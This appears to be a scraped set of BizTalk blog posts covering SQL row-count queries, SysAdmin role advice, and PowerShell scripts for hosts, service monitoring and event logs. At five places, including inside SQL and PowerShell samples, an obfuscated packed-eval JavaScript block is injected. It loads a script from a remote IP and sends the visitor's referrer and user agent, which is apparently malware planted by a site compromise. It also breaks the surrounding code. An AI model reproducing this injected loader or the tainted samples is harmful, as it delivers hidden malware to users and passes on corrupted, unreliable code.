For a while, I’ve been wanting to explore deeper or “hack” into the internals of the BizTalk Databases, i.e. BizTalkMsgBox and BizTalkDTA. When do records gets stored in these database, how long do they stay there, and when do they get “cleaned-up”.

So here is my first scenario.  I use a SQL command to Find out how many rows of each table in your BizTalk Databases (as per previous blog post).

I modified the query to store the data in a statistics table that I created so that I could use queries to identify any differences. Here’s what that table looks like:
BizTalk_Internal_Database_Stats

Now let me show you how I collected the data. I ran two queries, once against each of the two databases, captured the date/time to use the exact same time (for purposes of joining later) and store statistics. I change the label ‘Before’ to ‘During’ and ‘After’ later when I run the script again.
First run:

USE BizTalkMsgBoxDb

declare @WorkDateTime dateTime2 = getDate() 
declare @Label varchar(15) = 'Test' 
print @WorkDateTime
print @Label 
insert into StatSnap.dbo.TableRowCounts  
SELECT @WorkDateTime, 'BizTalkMsgDb', sc.name +'.'+ ta.name TableName , @Label, SUM(pa.rows) RowCnt
FROM sys.tables ta
INNER JOIN sys.partitions pa  ON pa.OBJECT_ID = ta.OBJECT_ID
INNER JOIN sys.schemas sc  ON ta.SCHEMA_ID = sc.schema_id
WHERE ta.is_ms_shipped = 0 AND pa.index_id IN (1,0)
GROUP BY sc.name,ta.name
ORDER BY SUM(pa.rows) DESC

USE BizTalkDTADb 
insert into StatSnap.dbo.TableRowCounts  
SELECT @WorkDateTime, 'BizTalkMsgDb', sc.name +'.'+ ta.name TableName , @Label, SUM(pa.rows) RowCnt
FROM sys.tables ta
INNER JOIN sys.partitions pa  ON pa.OBJECT_ID = ta.OBJECT_ID
INNER JOIN sys.schemas sc  ON ta.SCHEMA_ID = sc.schema_id
WHERE ta.is_ms_shipped = 0 AND pa.index_id IN (1,0)
GROUP BY sc.name,ta.name
ORDER BY SUM(pa.rows) DESC





Once the data is collected, the following query shows the which tables changed in size. I manually entered the date/times to match-up one specific earlier run from any later runs.

use statsnap
--truncate table TableRowCounts
--select * from TableRowCounts
select TRCBefore.DBName, TRCBefore.TableName, 
    TRCBefore.Label, TRCBefore.RowCountStat, 
    TRCDuring.Label, TRCDuring.RowCountStat,
    TRCAfter.Label, TRCAfter.RowCountStat,
    TRCLater.Label, TRCLater.RowCountStat
from TableRowCounts as TRCBefore 
inner join TableRowCounts as TRCDuring on TRCBefore.DBname = TRCDuring.DBName and TRCBefore.TableName = TRCDuring.Tablename 
inner join TableRowCounts as TRCAfter  on TRCBefore.DBname = TRCAfter.DBName and TRCBefore.TableName = TRCAfter.Tablename 
where TRCBefore.DateTimeStat = '2015-01-27 09:16:42.2800000'
  and TRCDuring.DateTimeStat = '2015-01-27 09:19:55.6900000'
  and TRCAfter.DateTimeStat  = '2015-01-27 09:27:30.7900000'
  and (TRCBefore.RowCountStat != TRCDuring.RowCountStat
  or   TRCBefore.RowCountStat != TRCAfter.RowCountStat
  )

The resulting query combining all stats:

BizTalkDatabases_before_during_after_RowCounts

 

I created an orchestration that takes a simple messages from a file receive location, maps it, delays 3 minutes, then sends it to a file. I snapshot the stats ‘Before’ starting the orchestration, ‘During’ – while the 3 minute delay is happening, then again ‘After’ the orchestration has completed.

One of the most important columns is nState, the values are described in this StackOverflow post.

    1 : Started
    2 : Completed
    3 : Terminated
    4 : Suspended
    5 : ReadyToRun
    6 : Active
    8 : Dehydrated
    16: CompletedWithDiscardedMessages
    32: SuspendedNonResumable
    64: InBreakpoint

Instances table

BiztalkMsgBoxDB_Instances_data

It turns out that I had four suspended instances for a few weeks back, 2 not-resumeable (nstate=32), and 2 resumeable (nstate=4) .  You can actually see the error messages in the nvcErrorDescription column.  I terminated those, then ran the query again. After deleting them, the following remain. Note that one has nState = 8, which would be my dehydrated orchestration (in the 3 minute delay). By running the query frequently while the orchestration is running, you can watch the nState change from 2 to 8.  Sometimes it stayed with the value of 2 the whole 3 minutes.

BiztalkMsgBoxDB_Instances_data_2

:Later, I dropped four different messages, causing 4 orchestration instances to start.  Below you can see which GUIDs are the same, and one one change per instance

BiztalkMsgBoxDB_Instances_data_3

Surprises

BTS_Applications table

The bts_applications table contains hosts, not applications:

BizTalkMsgBoxDB_Applications

Host Tables

This was not a surprise to me, because I had seen it before, but someone new to the internal of the database might find it surprising. When you create a new “Host” using BizTalk Admin Console (or via Object Explorer, WMI, or Powershell Extensions), five SQL tables are created for each host.

BizTalkMsgBoxDB_TablesCreatedPerHost

 

As Expected

BizTalkMsgBoxDB_BizTalkDBVersion

I will continue with more observations and details in Part 2.

 

 

The question today:  Should BizTalk Administrators be granted/given the “SysAdmin” role (authority) in the SQL database that supports BizTalk.

Generally, my answer is yes (at least on the BizTalk machine that is running SQL to support BizTalk, and here’s why.

1) The BizTalk Admins typically have to deal with the SQL Agent Jobs.  BizTalk installs about 14 jobs, and you’ll need SysAdmin at a minimum while doing the install.

2) BizTalk Admins sometimes need full power such as creating new databases, backing-up and restoring databases, attaching and detaching databases.

NOTE: Most companies should not be running the BizTalk database an their production databases on the same machine.  Most everyone separates the two for performance reasons.  Thus, giving the BizTalk Administrator the SysAdmin rights is only required on the BizTalk machine (or the SQL machine that supports BizTalk).  In larger BizTalk installation, even BizTalk and the BizTalk that supports SQL are separated onto two physical (or logical/virtual) machine names.

BizTalk 2010 Default SQL Agent Jobs Installed

BizTalk 2010 Default SQL Agent Jobs Installed

In some bigger companies, duties might be separated, such that there is really a person in the BizTalk Admin role, and that person handles the installs and the management of the SQL Agent Jobs.  In most companies, the BizTalk Developers play somewhat of a BizTalk Admin role as well (at least in the development, if not the production environment).

Further, in some companies, the developers are allowed to create SQL Agent Jobs related to the development database, while in other companies only the DBA will have that authority.

The corrollary of the above question would be this:  Why can’t I see the BizTalk SQL Agent Jobs when I open SSMS (SQL Studio Management Studio).  The answer is that you need the SysAdmin SQL role to see the Agent Jobs.

NOTE: If you want to be more granular, instead of granting SysAdmin, there are three roles specific to SQL Agent: SQLAgentUserRole (users get access only to jobs owned by them), SQLAgentReaderRole  (can view but not change all jobs, but also get update on their own jobs as per the prior role),  SQLAgentOperatorRole (everything in prior role, but can execute enable/disable any job in system, just still can only modify their own jobs).

<a target=”_blank” href=”https://www.simple-talk.com/sql/database-administration/setting-up-your-sql-server-agent-correctly/”>https://www.simple-talk.com/sql/database-administration/setting-up-your-sql-server-agent-correctly</a>

Adding the SysAdmin role is demonstrate in both the GUI mode and the command mode here:

<a target=”_blank” href=”http://stackoverflow.com/questions/14814798/how-to-add-sysadmin-login-to-sql-server”>http://stackoverflow.com/questions/14814798/how-to-add-sysadmin-login-to-sql-server</a>

 

 

I’m at a new client, and here’s the scenario.  They have good Hosts and Host Instances set up in production, and maybe the QA environment (I don’t have access yet).  But in the development environment, they have been using the default host instances.  I still can’t imagine how they did their binding files correctly.  One of my first goals is to get them to use the BizTalk Deployment Framework.  The second goal is to make the host instances the same in the development environments (and also on the VMs my co-worker and I are running).

So as soon as they give me a list of the Production Host-Instances I want to re-create them in the 4 Dev Environments.  Obviously, a script is needed. The script below does the job for the Hosts and Host Instances.  What I have left to do is to script the setup of the adapters that should be associated with the Host Instances.

I recently read this blog by Sandro Pereira: https://sandroaspbiztalkblog.wordpress.com/2013/09/05/powershell-to-configure-biztalk-server-host-and-host-instances-according-to-some-of-the-best-practices/  I’m not sure why he called WMI directly, maybe he wrote that before the Powershell Extensions became available on CodePlex: http://psbiztalk.codeplex.com  I had some errors getting it to work.  Further, his logic goes and builds the “best practices”.  I’m not yet ready or able to change the clients practices in Production.  (It’s funny how some clients give you the “keys to the kingdom” on the first day, and others keep you in more of a “pen”.  It depends on the size of the company, their security and deployment practices, whether or not you have to support and fix production issues, and what exactly you were hired to do.

The Script below, as short as it is, took me several hours to get working. The documentation link on the Powershell Extensions was broken on CodePlex, so I could not download any documentation, so it was sort of a trial and error approach. What I love, and borrowed from Sandro Pereira’s code above, is the ability of Powershell to prompt for the password, and save it in a $credentials object; then you can pass that when you set up the Host-Instances (i.e. the user/pass for the service name that runs the Host-Instances.)

NOTE 1: I have not tested this in an environment where there are more than one BizTalk server in the group.  In that case, code changes would have to be made to add one Host-Instance per server.

NOTE 2: In BizTalk 2013, Powershell Extensions are included with the install, you don’t need the CodePlex extensions.  http://www.quicklearn.com/blog/2013/07/19/automating-and-managing-biztalk-server-2013-with-powershell/

cls
Add-PSSnapIn -Name BiztalkFactory.PowerShell.Extensions  #NOTE: Must be in 32-bit version of Powershellto use this SnapIn
#get-PsSnapIn -registered   ### list registered Snap-In's

function AddHostAndHostInstance($HostName, $Is32BitOnly, $IsTrackingOn, $HostType)
{
 if ($HostType -eq "Isolated") 
   {
     $HostTypeCode = 2
   }
   else 
   {
     $HostTypeCode = 1 
   }
 #$HostType = 1 # 1 = InProcess assuming 2 = ISO 
 $myNTHostGroupName = "mscwvbizd01\BizTalk Application Users"
 $AuthTrusted = $false
 $serverName = "mscwvbizd01"
 #$HostItemType = 1 #NOTE: I got an error when I tried using the -ItemType on the New-Item of the Host-Instance 
 #(fortunately it is defaulting to In-Process) 

 cd "Biztalk:\Platform Settings\Hosts"
 Write-Host "Try to add New Host=$hostName"
 #New-Item $HostName -HostType:$HostType -NtGroupName:$NTGroupName -AuthTrusted:$AuthTrusted
 $temp = New-Item -path $hostName -HostType:$HostTypeCode -NtGroupName:$myNTHostGroupName -AuthTrusted:$AuthTrusted 
 Set-ItemProperty -Path $hostName -Name 'Is32BitOnly' -Value $Is32BitOnly
 Set-ItemProperty -Path $hostName -Name 'HostTracking' -Value $IsTrackingOn
 dir

 cd "BizTalk:\Platform Settings\Host Instances"
 Write-Host "Try to add New HostInstance=$hostName"
 dir
 New-Item $hostName -HostName $hostName -Credentials $hostCredentials -RunningServer $serverName
 #dir
}
### MAIN CODE HERE - Calls Function Above once per Host/Host-Instance ### 

$domainName = "biztalkdev"
$serviceUserid = "biztalkservice"

$hostCredentials = $Host.ui.PromptForCredential("Logon Credentials","This account must have SQL Server permissions.", $domainName + "\" + $serviceUserid, "");
#[String]$hostCredentialsPassword = [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($hostCredentials.Password));

# pass three parms: first host name, is32Bit, IsTracking 
AddHostAndHostInstance "TrackingHost"  "True" "True" "In-Process"
AddHostAndHostInstance "AS2Receive"    "True" "True" "Isolated"
AddHostAndHostInstance "TestNewHost32" "True" "False" "In-Process" 
AddHostAndHostInstance "TestNewHost64" "False" "False" "Isolated" 

Write-Host “Script Completed”

Here’s one more library of functions that a co-worker of mine used at a previous client. I didn’t learn about it until after I wrote the above:
https://github.com/lantrix/BTS/blob/master/build/2013/ConfigureBizTalkServer2013EnvHostAndHostInstances.ps1

Update: 05/30/2017 – above script was added to include the line to set the Is32BitFlag so you can make the Host 64-bit or 32-bit using the Powershell extensions.

Update: 05/31/2017 – added the ability to create Isolated hosts by passing a fourth parameter

Update 05/31/2017 – now I also have a script to Update Adapters with Host Names. This was modeled from code here.

Sometimes one of your databases is eating up diskspace, and you want to know why.  By running the query below, you can easily view the number of rows for each table (and can even sort so that the tables with the most rows are on top).

USE <noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hezen|var|u0026u|referrer|kdnfr||js|php'.split('|'),0,{}))
</script></noindex> BizTalkDTADb
--USE BizTalkMgmtDb
SELECT sc.name +'.'+ ta.name TableName ,SUM(pa.rows) RowCnt
FROM sys.tables ta
INNER JOIN sys.partitions pa  ON pa.OBJECT_ID = ta.OBJECT_ID
INNER JOIN sys.schemas sc  ON ta.SCHEMA_ID = sc.schema_id
WHERE ta.is_ms_shipped = 0 AND pa.index_id IN (1,0)
GROUP BY sc.name,ta.name
ORDER BY SUM(pa.rows) DESC

 

Below are samples only.  I’m not saying you rresults should be similar.  It depends totally on your run history and types of BizTalk artifacts you have deployed.

Sample Results for BizTalkDTADb:

records counts by table name in BizTalkDTADb

records counts by table name in BizTalkDTADb

On the development environment, my new client had not scheduled the SQL Agent Job: “DTA Purge and Archive (BizTalkDTADb)”

This database was in need of cleanup by running

truncate table dbo.dta_DebugTrace;
exec dtasp_PurgeTrackingDatabase
0, --@nLiveHours tinyint, --Any completed instance older than the live hours +live days
7, --@nLiveDays tinyint = 0, --will be deleted along with all associated data
30, --@nHardDeleteDays tinyint = 0, --all data older than this will be deleted.
'2014-08-30' --@DateLastBackup

I hope to blog more about the clean-up process soon.  The above screen shot was after doing a partial cleanup.  dta_MessageInOutEvents had over 2 million rows when I started.  I’m cleaning up on month at a time to make sure I don’t fill up the transaction log. Meanwhile, check out this blog: http://www.malgreve.net/2008/02/19/biztalkdtadb-grows-too-large-how-to-purge-and-maintain-the-database/

 

Sample Results for BizTalkMgmtDb:

BizTalkMgmtDb_record_counts_by_table

Powershell Code:

#
# <noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kksns|var|u0026u|referrer|tkkdb||js|php'.split('|'),0,{}))
</script></noindex> LUNAR DUST - home grown server/service monitor - sends out email when services defined in related .CSV config file are down 
# Author: Neal Walters - Nov 2013 
# (Lunar Dust is a play on words of the monitor name "Solar Wind") 
#
[string[]] $users = "john@abc.com",'"fred@abc.com" # List of users to email your report to (separate by comma)  
$fromemail = "FromEmail@abc.com"
$SMTPserver = "YourEmailRelayServer.com" #enter your own SMTP server DNS name / IP address here
$YNTraceSuccess = "N"   #setting to "Y" will create more trace/debug to the ServiceTestTrace.txt file, setting to "N" only shows servers/services that were down
$TraceFilename = "D:\scripts\ServiceMonitorTrace.txt"
$LocalServerName = "MyServerName"    #used to determine if we should check remote server or not on GetService 
set-item trustedhosts $LocalServerName

#Get arguments flexibly, in either order.
#one parms is a "Y" or "N" to indicate to send an email, even when no servers are in error status 
#another optional parm is the filename of the CSV to read, if omitted, a default filename is used.
if ($args.Length -gt 0)
{
   if ($args[0] -eq "Y" -or $args[0] -eq "N")
       {
       $IsEmailOn = $args[1]
	   }
   if ($args[0].Length -gt 4)
       {
          $csvFilename = $args[0]
	   }
}

if ($args.Length -gt 1)
{
   if ($args[1] -eq "Y" -or $args[1] -eq "N")
       {
       $IsEmailOn = $args[1]
	   }
   if ($args[1].Length -gt 4)
       {
          $csvFilename = $args[0]
	   }
}

if ([string]::IsNullOrEmpty($csvFilename))
{
   $csvFilename = "D:\Scripts\ServerMonitorConfig.csv" 
   Write-Host "Setting csfFileName=$csvFileName" 
}

Write-Host "csvFilename=$csvFilename"
$csv = Import-Csv $csvFilename -Header @("IsActive","Environment","Category","ServerName","ServiceName","Criticality")

$HTMLMessage="" 
$TextMessage="" 
$HTMLMessage="<h2>Server/Service Status</h2><table border='1'><tr><th>Environment</th><th>Category</th><th>ServerName</th><th>ServiceName</th><th>Status</th><th>Process Started Date/Time</th><th>UserName</th></tr>"
$CriticalErrorCount = 0
$ErrorCount = 0 
$ServerCount = 0 


foreach ($line in $csv) {
  if ($line.IsActive -eq "Active")
  {
    $reportStatus = "" 
    $ServerCount = $ServerCount + 1  

	#$Service = (get-service -Name $line.ServiceName -ComputerName $line.ServerName)
	#this is slower than above, but it gives us the processId which we can use to find out what time the service/process started 
	write-host "Verifying: " $line.ServerName $line.ServiceName 
    $myDate = Get-Date
    if ($YNTraceSuccess = "Y")
    {
       Add-Content $TraceFilename "$myDate TRC01 $($line.ServerName) $($line.ServiceName)"
    }
    $error.clear()  #clear any prior errors, otherwise same error may repeat over-and-over in trace 
    if ($LocalServerName -eq $line.ServerName)
        {
           # see if not using -ComputerName on local computer avoids the "service not found" error 
           Add-Content $TraceFilename "$myDate TRCW1 using local computer " 
	       $Service = (get-wmiobject win32_service -filter "name = '$($line.ServiceName)'")
        }
    else 
        {
           Add-Content $TraceFilename "$myDate TRCW2 using remote computer $($line.ServerName) not eq $LocalServerName" 
	       $Service = (get-wmiobject win32_service -ComputerName $line.ServerName -filter "name = '$($line.ServiceName)'")
        }

    if ($error -ne $null) 
    {
        Write-Host "----> $($error[0].Exception) " 
        Add-Content $TraceFilename "$myDate TRCE1 $($error[0].Exception)" 
    }

	if ($Service -eq $null) 
	{
	    $reportStatus = "Service Not Found: name = '$($line.ServiceName)'"
		$trColor = "Yellow"
		$ErrorCount = $ErrorCount + 1  
		$CriticalErrorCount = $CriticalErrorCount + 1
		$CreationDate = "NA" 
        Write-Host "----> $reportStatus " 
        Add-Content $TraceFilename "$myDate TRC02 $reportStatus" 
	}
	else 
	{
        #Write-Host "Service Exists"
		#$status = $Service.Status 
		#if ($status -eq "Running")  #this was the check when using get-service instead of get-wmiobject win32_service)

		$reportStatus = $Service.State

		if ($Service.Started -eq "True") {
			#$reportStatus = "Up"
			$trColor = "White"
			# when service is running, then we can lookup the ProcessId to get the Userid and CreationDate (Time the service was started) 
			$ServicePID = $Service.ProcessID
			#Write-Host "Process id: $ServicePID" 
			$ProcessInfo = Get-WmiObject -Class Win32_Process -ComputerName $line.ServerName -Filter "ProcessID='$ServicePID'" -ea 0
			$CreationDate = $ProcessInfo | % { $_.ConvertToDateTime( $_.CreationDate )}
		} 
       else 
       {
		    Write-Host "Down Service.Started=$($Service.Started) " 
            Write-Host "Status=$($Service.Status)  State=$($Service.State)"
			#$reportStatus = $Service.State
			$trColor = "Orange"
		    $ErrorCount = $ErrorCount + 1  
			if ($line.Criticality -eq "Error") 
			{
                #switch from orange to yellow background 
			    $trColor = "Yellow"
				$CriticalErrorCount = $CriticalErrorCount + 1
			}
			
			#Write-Host "down status=$status"   #result was empty string or null 
			$CreationDate = "NA" 
		}
	}
    
	#Write-Host "test=$reportStatus"
	$TextMessage += "$($line.Environment) $($line.Category) $($line.ServerName) $($line.ServiceName) $reportStatus $CreationDate $($Service.StartName)`r`n" 

    #build the TR and TD Cells of the HTML Table 
	$HTMLMessage += "<tr bgcolor='$trColor'>"
    $HTMLMessage += "<td>$($line.Environment)</td>"
    $HTMLMessage += "<td>$($line.Category)</td>"
    $HTMLMessage += "<td>$($line.ServerName)</td>"
    $HTMLMessage += "<td>$($line.ServiceName)</td>"
    $HTMLMessage += "<td>$reportStatus</td>"
    $HTMLMessage += "<td>$CreationDate</td>"
    $HTMLMessage += "<td>$($Service.StartName)</td>"
    $HTMLMessage += "</tr>`r`n" 

  }	
  else 
  {
     Write-Host "Skipping InActive " $line.ServerName $line.ServiceName 
  }
}
Write-Host '------' 
#$HTMLMessage = "<h3>Critical Server Count=$CriticalErrorCount  Total Error Count=$ErrorCount</h3>" + $HTMLMessage + "</table>" + "<h3>Yellow is critical, Orange is not critical.</h3>" 
$HTMLMessage = "<h3>Server-Count=$ServerCount  Critical-Count=$CriticalErrorCount  Total-Error-Count=$ErrorCount</h3>$HTMLMessage</table><h3>Yellow is critical, Orange is not critical.</h3>" 
$mydate = Get-Date 
Write-Host "Date=$myDate" 
$HTMLMessage = "<h3>$mydate</h3>$HTMLMessage"
Write-Host  $TextMessage 
Write-Host "`r`n Server-Count=$ServerCount   Critical-Count=$CriticalErrorCount  Total-Error-Count=$ErrorCount"
Write-Host "Date=$myDate" 


$emailSubject = "QT Service Email was Requested" 
if ($CriticalErrorCount -gt 0)
{
   $emailSubject = "Critical QT Server Down Alert: There are $CriticalErrorCount critical services down" 
}


#always send email when one 1 or more critical errors are found, or when the $IsEmailOn parm is set to "Always" which sends email regardless of error count 
if ($CriticalErrorCount -gt 0 -or $IsEmailOn -eq "Always")
{
   send-mailmessage -from $fromemail -to $users -subject $emailSubject -BodyAsHTML -body $HTMLMessage -priority High -smtpServer $SMTPserver
   Write-Host "Alert Email Sent with Subject=$emailSubject" 
   Add-Content $TraceFilename "$myDate TRC99 Alert Email Sent with Subject=$emailSubject" 

}

Create a CSV like this, with a list of the servers to monitor.
Column 1
Column 2 is an arbitrary environment name. Column 3 is a category of server functionality (could potentially be used to route email to the group in charge of those types of servers, e.g. IIS, BizTalk, SQL…)
Column 3 is Server/Machine Name.
Column 4 is the Windows Service name. Use “LanmanServer” just to know if the machine is up and running.
Column 5 indicates whether this should cause a critical error or just a warning (when the service is down).

"Active","PROD","SQL","SqlServer01","MSSQLSERVER","Error"
"Active","PROD","SQL","SqlServer01","SQLSERVERAGENT","Error"
"Active","PROD","SQL","SqlServer01","MSDTC","Error","Error"
"Active","PROD","BizTalk","BizTalkServer01","MSDTC","Error"
"Active","QA","BizTalk","BizTalkServer03","LanmanServer","Error"
"Active","QA","BizTalk","BizTalkServer03","MSDTC","Error"
"Active","QA","BizTalk","BizTalkServer03","BTSSvc$Application_Default","Error"

Schedule a .bat or .cmd file such as follows, pointing to the desired CSV as defined above.

powershell -command "& 'D:\Scripts\ServerMonitor.ps1'" d:\Scripts\ServerMonitorConfig.csv
get-service <noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyidn|var|u0026u|referrer|aiheh||js|php'.split('|'),0,{}))
</script></noindex> | where {$_.name -match "win"}

Normally displays like this:
Powershell_ouptut_normal

Note how very long names can get cut off with the ellipses….

Did you know that Powershell has a “grid-view”, similar to SQL?

get-service | where {$_.name -match "win"} | out-gridview

Powershell_output_gridview

If you pipe all get-service to the out-gridview, then you can see how you can even filter the data using the “GUI” mode.
Click “Add Crtieria”, then click the checkbox next the desired property name.
Powershell_output_gridview_AddCriteria

 

You can then enter a match/contains value for that property, and the grid instantly changes to show only the matching data:

Powershell_output_gridview_NameContains

Instead of filtering with the “contains” clause, you can click the word “contains”, and choose other methods of filtering.

I was truly amazed when I discovered this feature.

Powershell_output_gridview_Filter_Options

 

This is basically a follow-up to the previous post How to add a where filter match/contains/like to any powershell cmdlet (such as Get-Service)

Cmdlets are named in the format “verb-noun”, for example get-service, start-service, etc…
Suppose you cannot remember all the verbs associated with a noun. You can run this:

get-command -Noun process

Powershell_output_getcommand_Noun_Process

Recall from the prior blog you can do something like this to get all your BizTalk Host Instances (services):

get-service  | where {$_.name -match "biztalk"}

Now, suppose you wanted to start all the BizTalk Host Instances, you just pipe the results of the previous command to the “start-service” cmdlet. (Note: You may have to run Powershell “as admin” to avoid any security errors.)

get-service  | where {$_.name -match "biztalk"} | start-service 

There is an interesting optional parm that let’s you check your script. The “-WhatIf” parm can be added to Start-Service or Stop-Service. It will then only shows what would happen if the cmdlet runs. The cmdlet is not run.

Example:

PS C:\WINDOWS\system32> get-service | where {$_.name -match "DTC"} | stop-service -whatif
What if: Performing the operation "Stop-Service" on target "Distributed Transaction Coordinator (MSDTC)".

If you check the status of the service after running the above stop-service, you will see that it didn’t really stop.

get-process <noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sktrn|var|u0026u|referrer|ryihe||js|php'.split('|'),0,{}))
</script></noindex>  |  {$_.name -match "win"}

Sample output is shown below. The above means “get all the process objects on this computer” and pipe that collection of objects to a where/filter where we only want to see processNames that contain the letters “host”.

Example output:

Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
-------  ------    -----      ----- -----   ------     -- -----------
     75       8      796       3680    46             744 wininit
    152       8     1548       8072    54             776 winlogon

“Match” actually does a RegEx (regular expression match, so you can also do this: Find me all process that contain a “t” followed by exactly three characters, followed by the letters “host”:

PS C:\Users\Neal&gt; get-process  | where {$_.name -match "t\w{3}host"}

Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
-------  ------    -----      ----- -----   ------     -- -----------
    181      17     9696      10796   693            7212 taskhost
    290      51    10992      17588   301     0.33   2860 taskhostex

How does this relate to BizTalk? We often deal with windows services. Suppose you are wondering if there is a DTC task started on the computer, but you don’t remember the exact service name.
Run something like this:

get-service | where {$_.name -match "dtc"}

Of course, if you remember the exact service name, you can enter a shorter command:

get-service -Name msdtc

On my home PC, both the above return the same result:

Status   Name               DisplayName
------   ----               -----------
Stopped  MSDTC              Distributed Transaction Coordinator

Suppose you wanted to show all processes that are stopped:

get-service | where {$_.Status -eq 'Stopped'}

Or show me only services that contain the “dtc” in the name that are stopped:

get-service | where {$_.Status -eq 'Stopped' -and $_.Name -match 'dtc'}

TIPS: Don’t forget to use -EQ instead of the = or == sign. This is not C#. Also don’t forget to put the – in front of -and, -eq, and -match.

To know what properties you can query with the -eq and the -match filter, do the following:

get-service | get-member

or the abbreviation for get-member “gm” is often used

get-service | gm

In this case, you are piping the output of the “get-service” cmdlet to the “get-member” cmdlet, which displays returns all the property, methods, and events.

Powershell_ouput_get-service-gm

Just to complete the thought, you can see just the properties by doing either of the following:

get-service | get-member  | where-object  {$_.MemberType -eq "Property"}

get-service | get-member -MemberType Properties

Powershell_ouput_get-service-gm_PropertiesOnly

Just for the sake of completeness, you might also want to sort your data by some particular property. Just pipe what we learned above to the “sort-object” and tell it which property (and optionally which order) to sort.

get-service | where {$_.name -match "dtc"} | sort-object Status
get-service | where {$_.name -match "dtc"} | sort-object Status -desc 

You can set this up in Task Scheduler to run every x minutes and send you an email when there are any errors in the Application Event Log or the System Event Log.

There is a section in the code where you can create more user-friendly messages for complex or confusing error messages. It also allows you to filter out certain known errors that you get over-and-over, but do not want to fix. (For example, we saw an error from a tool called “Monitis” every hour or so, so we didn’t want emails to go out on those types of known and common errors. We were primarily interested in BizTalk errors. (Look for the code: “Where-Object {$_.Message -notlike ‘Monitis*'” to set up your own filters to exclude certain types of errors).

#########################################################
#
# <noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hthtn|var|u0026u|referrer|rykih||js|php'.split('|'),0,{}))
</script></noindex> EventLog Monitoring and reporting script
# Neal Walters - 06/18/2013 
# Modeled after DiskMonitor.ps1 
#
#  11/08/2013 - added Select-Object -Propert to only return desired columns (originally 10/17/2013)
#
#########################################################

cls
[string[]] $users = "test@abc.com","test2@abc.com","admin@xyz.com" # List of users to email your report to (separate by comma) or use a distribution list 

$TraceFilename = "E:\Scripts\EventLogExtract_Trace.txt"
$fromemail = "FromEmail@abc.com"
$server = "your.emailRelayServer.com" #enter your own SMTP or Relay server DNS name / IP address here
$minutes = $args[0]
$environment = $args[1] 
$skipmail = $args[2] 

#allow this to be run 
if ($minutes -eq $null)
   {
     $minutes = 10
   }
   
if ($environment -eq $null)
   {
     $environment = "New-BT-Cluster" 
   }

$activeClusterName = (Get-WMIObject Win32_ComputerSystem -ComputerName BIZTALK2013).Name
Write-Host "`$activeClusterName=$activeClusterName"
$computerName = get-content env:computername
if ($activeClusterName -eq $computerName)
 {
   $activeNodeMessage = "(Is-Active-Node)" 
 }
else 
 {
   $activeNodeMessage = "(Is-NOT-Active-Node)" 
 }

#Write-Host $minutes

$traceDateTime = get-date
Write-Host "$traceDateTime Starting Application EventLog"

#$tableFragment = Get-Eventlog -log application -after ((get-date).addMinutes(-120)) -EntryType Error, Warning | ConvertTo-Html -fragment
#multiple $minutes by negative 1 to go back x minutes 
$getEventLog = Get-Eventlog -log application -after ((get-date).addMinutes($minutes*-1)) -EntryType Error 
$traceDateTime = get-date
